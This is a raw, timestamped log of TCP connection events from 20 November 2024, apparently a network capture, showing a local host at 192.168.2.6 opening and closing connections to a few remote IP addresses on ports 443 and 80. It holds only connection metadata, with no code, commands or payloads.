                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.361162901 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.361346960 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.361402035 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.364609957 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.364631891 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.364645958 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.364655972 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.369251013 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.369291067 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.369365931 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.369539976 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.369564056 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.386145115 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.386781931 CET49812443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.386801004 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.387327909 CET49812443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.387332916 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.413393974 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.413716078 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.413784027 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.413852930 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.413865089 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.413876057 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.413882017 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.417125940 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.417156935 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.417237997 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.417432070 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.417448997 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.423337936 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.423648119 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.423712015 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.423751116 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.423758984 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.426774979 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.426938057 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.426987886 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.427764893 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.427772045 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.427839994 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.427844048 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430427074 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430452108 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430537939 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430593967 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430619955 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430671930 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430855989 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430856943 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430870056 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.430871964 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.497299910 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.497489929 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.497602940 CET49812443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.497854948 CET49812443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.497854948 CET49812443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.497874022 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.497884035 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.500880003 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.500890017 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.500977039 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.501144886 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.501157045 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.898370028 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.898415089 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.898483992 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.900023937 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.900037050 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.027575016 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.028177977 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.028192997 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.028681993 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.028686047 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.073878050 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.074598074 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.074615955 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.075103998 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.075109005 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.101538897 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.102195978 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.102205992 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.102608919 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.102612972 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.106805086 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.107182026 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.107188940 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.107534885 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.107538939 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.135214090 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.135289907 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.135349989 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.135636091 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.135649920 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.135663033 CET49816443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.135668039 CET4434981613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.139283895 CET49824443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.139317989 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.139405966 CET49824443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.139615059 CET49824443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.139630079 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.167484999 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.168205023 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.168214083 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.168741941 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.168746948 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.175079107 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.175252914 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.175334930 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.175398111 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.175409079 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.175417900 CET49820443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.175422907 CET4434982013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.178698063 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.178715944 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.178813934 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.178982019 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.178992987 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.210059881 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.210458040 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.210534096 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.210572004 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.210577965 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.210676908 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.210681915 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.212793112 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213052988 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213123083 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213175058 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213179111 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213212967 CET49819443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213217020 CET4434981913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213675976 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213713884 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213771105 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213915110 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.213931084 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.215128899 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.215152979 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.215217113 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.215337038 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.215346098 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.271302938 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.271588087 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.271650076 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.271697044 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.271706104 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.271716118 CET49821443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.271722078 CET4434982113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.275825024 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.275890112 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.275971889 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.276209116 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.276225090 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.610810041 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.610888004 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.613308907 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.613317013 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.613748074 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.658905029 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.661884069 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.703352928 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.787604094 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.788598061 CET49824443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.788609982 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.789118052 CET49824443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.789124012 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.820147038 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.822602034 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.822616100 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.823231936 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.823236942 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.843651056 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.845180035 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.845201015 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.846071005 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.846076965 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.849844933 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.850084066 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.854836941 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.854967117 CET8049832185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.855046034 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.855156898 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.855192900 CET4983280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.859983921 CET8049832185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.859994888 CET8049832185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.860938072 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.861489058 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.861504078 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.862890959 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.862900019 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.888442039 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.888535976 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.888672113 CET49824443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.888827085 CET49824443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.888827085 CET49824443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.888844967 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.888854980 CET4434982413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.892606020 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.892630100 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.892730951 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.892961025 CET49833443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.892973900 CET4434983313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.912101030 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.913438082 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.913460970 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.914007902 CET49828443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.914014101 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.930636883 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.933823109 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.933871984 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.933877945 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.933947086 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.934063911 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.934076071 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.934089899 CET49825443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.934097052 CET4434982513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.936729908 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.936815023 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.936878920 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.937242985 CET49823443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.937254906 CET44349823184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.938148975 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.938173056 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.938241959 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.941119909 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.941132069 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.956605911 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.957263947 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.957334042 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.961749077 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.961749077 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.961760998 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.961771965 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966412067 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966432095 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966485977 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966485977 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966546059 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966953993 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966973066 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966985941 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.966999054 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.981522083 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.981551886 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.981672049 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.984173059 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.984184980 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.984411001 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.984433889 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.984488964 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.984635115 CET49836443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.984646082 CET4434983613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.996481895 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.996496916 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.996587992 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.997342110 CET49837443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:28.997355938 CET44349837184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.012589931 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.013045073 CET4434982813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:29.013091087 CET49828443192.168.2.613.107.246.45
